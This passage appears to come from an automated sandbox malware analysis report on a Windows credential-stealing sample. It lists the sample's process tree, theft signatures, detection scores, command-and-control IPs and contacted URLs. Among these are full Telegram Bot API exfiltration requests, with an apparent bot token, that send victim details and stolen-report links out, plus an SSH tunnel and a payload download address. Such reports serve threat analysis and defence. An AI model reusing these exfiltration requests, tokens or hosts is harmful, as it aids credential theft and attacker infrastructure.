61 timeout.exe 1 36->61         started        63 2 other processes 36->63 process13 dnsIp14 103 ip-api.com 208.95.112.1, 49737, 49739, 80 TUT-ASUS United States 55->103 105 api.telegram.org 149.154.167.220, 443, 49743, 49744 TELEGRAMRU United Kingdom 55->105 107 2 other IPs or domains 55->107 135 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 55->135 137 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 55->137 139 Tries to steal Mail credentials (via file / registry access) 55->139 141 3 other signatures 55->141 65 cmd.exe 55->65         started        68 cmd.exe 55->68         started        70 ssh.exe 55->70         started        signatures15 process16 dnsIp17 111 Tries to harvest and steal WLAN passwords 65->111 73 conhost.exe 65->73         started        75 chcp.com 65->75         started        77 netsh.exe 65->77         started        79 findstr.exe 65->79         started        81 conhost.exe 68->81         started        83 chcp.com 68->83         started        85 netsh.exe 68->85         started        87 findstr.exe 68->87         started        101 serveo.net 138.68.79.95, 22, 49740, 49742 DIGITALOCEAN-ASNUS United States 70->101 89 conhost.exe 70->89         started        signatures18 process19

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  jqOHOuPMJP.exe13%ReversingLabs
                  jqOHOuPMJP.exe24%VirustotalBrowse
                  jqOHOuPMJP.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  serveo.net8%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  http://www.microsoft.co(=0%Avira URL Cloudsafe
                  https://e2111f95f52ba8be6b2d3394e38b1722.se0%Avira URL Cloudsafe
                  http://crl.v0%URL Reputationsafe
                  http://193.142.58.127:800%Avira URL Cloudsafe
                  http://23.224.102.6:80010%Avira URL Cloudsafe
                  http://216.250.190.139:80100%Avira URL Cloudmalware
                  http://185.119.118.59:80800%Avira URL Cloudsafe
                  http://216.250.190.139:808%VirustotalBrowse
                  http://193.142.58.127:807%VirustotalBrowse
                  http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user0%Avira URL Cloudsafe
                  http://185.119.118.59:80801%VirustotalBrowse
                  http://185.119.118.59:808020%Avira URL Cloudsafe
                  http://107.161.20.142:80800%Avira URL Cloudsafe
                  http://107.161.20.142:80803%VirustotalBrowse
                  http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user0%Avira URL Cloudsafe
                  https://13.231.21.109:4430%Avira URL Cloudsafe
                  https://192.99.196.191:443100%Avira URL Cloudmalware
                  http://185.119.118.59:808021%VirustotalBrowse
                  https://e483612b93e055308d0c85f365c474ee.serveo.net/0%Avira URL Cloudsafe
                  http://66.42.56.128:80100%Avira URL Cloudmalware
                  https://64.227.21.98:4430%Avira URL Cloudsafe
                  http://23.224.102.6:80011%VirustotalBrowse
                  http://185.119.118.59:8080/get0%Avira URL Cloudsafe
                  https://13.231.21.109:4430%VirustotalBrowse
                  http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user0%Avira URL Cloudsafe
                  http://129.151.109.160:80800%Avira URL Cloudsafe
                  http://66.42.56.128:809%VirustotalBrowse
                  http://127.0.0.1:6787/0%Avira URL Cloudsafe
                  http://82.147.850%Avira URL Cloudsafe
                  http://82.147.85.194/byte/@jokerbot880901.txt100%Avira URL Cloudmalware
                  http://129.151.109.160:80803%VirustotalBrowse
                  http://23.248.176.37:1800%Avira URL Cloudsafe
                  https://64.227.21.98:4430%VirustotalBrowse
                  http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr0%Avira URL Cloudsafe
                  http://82.147.850%VirustotalBrowse
                  http://185.119.118.590%Avira URL Cloudsafe
                  http://127.0.0.1:0%Avira URL Cloudsafe
                  http://45.61.136.52:800%Avira URL Cloudsafe
                  http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net0%Avira URL Cloudsafe
                  http://185.119.118.59:8080/get1%VirustotalBrowse
                  http://23.248.176.37:1801%VirustotalBrowse
                  http://185.119.118.59:8080/hkLYW_user0%Avira URL Cloudsafe
                  http://45.61.136.13:800%Avira URL Cloudsafe
                  http://45.61.136.52:800%VirustotalBrowse
                  http://154.26.128.6:800%Avira URL Cloudsafe
                  http://212.6.44.53:80800%Avira URL Cloudsafe
                  http://185.217.98.121:80100%Avira URL Cloudmalware
                  https://44.228.161.50:443100%Avira URL Cloudmalware
                  http://212.6.44.53:80801%VirustotalBrowse
                  http://104.248.208.221:800%Avira URL Cloudsafe
                  https://164.90.185.9:443100%Avira URL Cloudmalware
                  https://44.228.161.50:4432%VirustotalBrowse
                  http://185.119.118.590%VirustotalBrowse
                  http://104.248.208.221:801%VirustotalBrowse
                  http://154.26.128.6:800%VirustotalBrowse
                  http://18.228.80.130:80100%Avira URL Cloudmalware
                  http://185.217.98.121:8015%VirustotalBrowse
                  http://185.217.98.121:8080100%Avira URL Cloudmalware
                  http://193.142.58.127:80Pk0%Avira URL Cloudsafe
                  https://164.90.185.9:4439%VirustotalBrowse
                  https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net0%Avira URL Cloudsafe
                  https://e483612b93e055308d0c85f365c474ee.serveo.net0%Avira URL Cloudsafe
                  http://45.61.136.13:802%VirustotalBrowse
                  http://144.126.132.141:80800%Avira URL Cloudsafe
                  http://pesterbdd.com/i?100%Avira URL Cloudmalware
                  https://18.178.28.151:4430%Avira URL Cloudsafe
                  http://82.147.85.194/byte/100%Avira URL Cloudmalware
                  http://18.228.80.130:8011%VirustotalBrowse
                  http://127.0.0.1:6787/ing=no0%Avira URL Cloudsafe
                  http://149.88.44.159:800%Avira URL Cloudsafe
                  http://82.147.85.1940%Avira URL Cloudsafe
                  https://192.99.196.191:4434%VirustotalBrowse
                  http://185.217.98.121:808011%VirustotalBrowse
                  https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/0%Avira URL Cloudsafe
                  https://185.217.98.121:443100%Avira URL Cloudmalware
                  http://116.202.101.219:8080100%Avira URL Cloudmalware
                  https://api.tele0%Avira URL Cloudsafe
                  http://127.0.0.1:18772/handleOpenWSR?r=0%Avira URL Cloudsafe
                  http://206.189.109.146:80100%Avira URL Cloudmalware
                  http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  serveo.net
                  		138.68.79.95
                  		truefalseunknown
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTMLfalse
                        		high
                        https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTMLfalse
                          		high
                          http://ip-api.com/line?fields=query,countryfalse
                            		high
                            http://82.147.85.194/byte/@jokerbot880901.txtfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTMLfalse
                              		high
                              https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTMLfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://193.142.58.127:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 7%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.microsoft.co(=powershell.exe, 00000001.00000002.1717242084.0000000007819000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://216.250.190.139:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 8%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown
                                https://duckduckgo.com/chrome_newtabvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://23.224.102.6:8001vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.telegram.org/botvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://e2111f95f52ba8be6b2d3394e38b1722.sevkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.119.118.59:8080vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://107.161.20.142:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 3%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.119.118.59:80802vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://13.231.21.109:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://192.99.196.191:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://e483612b93e055308d0c85f365c474ee.serveo.net/ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000021.00000002.4113726250.0000029260842000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://66.42.56.128:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 9%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://ip-api.comvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://64.227.21.98:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997F9F000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A001B2000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B62000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://185.119.118.59:8080/getvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 1%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://129.151.109.160:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 3%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://127.0.0.1:6787/vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, hahahahaha.txt.18.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://82.147.85jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmptrue
                                                • URL Reputation: malware
                                                		unknown
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01A44000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D17F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://23.248.176.37:180vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ip-api.com/line?fields=queryvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://185.119.118.59:8080/hkLYW_user%40468325_report.wsrvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.ecosia.org/newtab/vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://185.119.118.59vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://127.0.0.1:vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://45.61.136.52:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                		unknown
